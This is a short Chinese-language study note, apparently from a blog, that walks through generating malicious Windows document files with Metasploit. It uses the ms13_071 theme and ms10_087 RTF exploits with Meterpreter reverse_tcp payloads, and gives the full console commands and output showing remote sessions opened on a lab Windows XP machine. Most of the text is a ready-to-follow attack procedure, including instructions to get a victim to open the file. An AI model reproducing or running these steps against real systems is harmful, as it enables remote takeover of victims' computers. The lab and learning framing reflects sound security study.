!!!笔记仅供学习交流使用,请勿进行其他用途!!!
Metasploit自带了很多漏洞文件生成模块,这里只笔记下最简单的使用:
root@kali:~# msfconsole 。。。。。。 。。。。。。 msf > search fileformat #搜索可用模块 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- 。。。。。。 。。。。。。
CONTENTS
第一种使用方式,不通过handler直接连接
msf> use exploit/windows/fileformat/ms13_071_theme msf exploit(ms13_071_theme) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- 。。。。。。。 。。。。。。。 msf exploit(ms13_071_theme) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms13_071_theme) > show options Module options (exploit/windows/fileformat/ms13_071_theme): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.theme yes The theme file SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 445 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) UNCPATH no Override the UNC path to use (Ex: \\192.168.1.1\share\exploit.scr) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows XP SP3 / Windows 2003 SP2 msf exploit(ms13_071_theme) > set LHOST 192.168.19.128 LHOST => 192.168.19.128 msf exploit(ms13_071_theme) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.19.128:4444 msf exploit(ms13_071_theme) > [*] Generating our malicious executable... [*] Creating 'msf.theme' file ... [+] msf.theme stored at /root/.msf4/local/msf.theme [+] Let your victim open msf.theme [*] Ready to deliver your payload on \\192.168.19.128\mEjIom\pDuQX.scr [*] Server started. #此时在windows上打开文件msf.theme,点击【 屏幕保护 】选项卡,会触发漏洞,如下 [*] Sending stage (769024 bytes) to 192.168.19.129 [*] Meterpreter session 1 opened (192.168.19.128:4444 -> 192.168.19.129:1155) at 2014-06-04 21:45:19 +0800 msf exploit(ms13_071_theme) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WINXP-PRO-VM\Administrator @ WINXP-PRO-VM 192.168.19.128:4444 -> 192.168.19.129:1155 (192.168.19.129) msf exploit(ms13_071_theme) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : WINXP-PRO-VM OS : Windows XP (Build 2600, Service Pack 2). Architecture : x86 System Language : zh_CN Meterpreter : x86/win32 meterpreter >
第二种使用方式,通过handler连接
msf> use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof msf exploit(ms10_087_rtf_pfragments_bof) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- 。。。。。。 。。。。。。 msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms10_087_rtf_pfragments_bof) > show options Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.rtf yes The file name. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.19.128 #将LHOST设置为本地IP LHOST => 192.168.19.128 msf exploit(ms10_087_rtf_pfragments_bof) > set LPORT 8888 #手动设置下LPORT LPORT => 8888 msf exploit(ms10_087_rtf_pfragments_bof) > exploit [*] Creating 'msf.rtf' file ... [+] msf.rtf stored at /root/.msf4/local/msf.rtf msf exploit(ms10_087_rtf_pfragments_bof) > back msf> use exploit/multi/handler #切换到handler模块 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LHOST 192.168.19.128 #设置好本地监听IP LHOST => 192.168.19.128 msf exploit(handler) > set LPORT 8888 #设置好本地监听端口 LPORT => 8888 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.19.128:8888 [*] Starting the payload handler... #在windows上打开msf.rtf文件,会触发漏洞,如下 [*] Sending stage (769024 bytes) to 192.168.19.129 [*] Meterpreter session 2 opened (192.168.19.128:8888 -> 192.168.19.129:1163) at 2014-06-04 21:53:35 +0800 meterpreter > sysinfo Computer : WINXP-PRO-VM OS : Windows XP (Build 2600, Service Pack 2). Architecture : x86 System Language : zh_CN Meterpreter : x86/win32 meterpreter >
发表评论